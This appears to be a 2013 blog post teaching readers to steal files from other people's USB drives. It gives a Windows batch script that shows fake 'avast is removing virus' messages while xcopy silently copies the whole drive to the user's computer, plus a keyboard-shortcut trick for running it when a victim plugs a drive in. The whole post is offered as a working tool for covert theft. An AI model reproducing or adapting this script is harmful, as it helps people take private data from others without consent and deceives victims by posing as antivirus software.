Sunday, August 11, 2013

Stolen data from anyone's pendrive

copy data from anyone's pendrive

you can copy data from any one's pendrive without knowing him easyly with .bat file
you have to make a bat file file to copy a pen drive to your computer

(1) open notepad
(2) write bellow code
(3)save file with .bat

@echo off
echo avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f:(path of pendrive) d:\Cyber(path where you want save data)
cls
echo virus removed

EXAMPLE
@echo off
echo avast is working to remove virus
echo please wait for some time do not close.........
echo process is running
xcopy /a /e /k /q /h f: d:\Cyber
cls
echo virus removed

TRICK make 3-4 file of different file with like f: i: h:
now make shortcut of that file
right click on it 
give shortcut key(as above)
its done when someone insert pendrive press that key done.

No comments: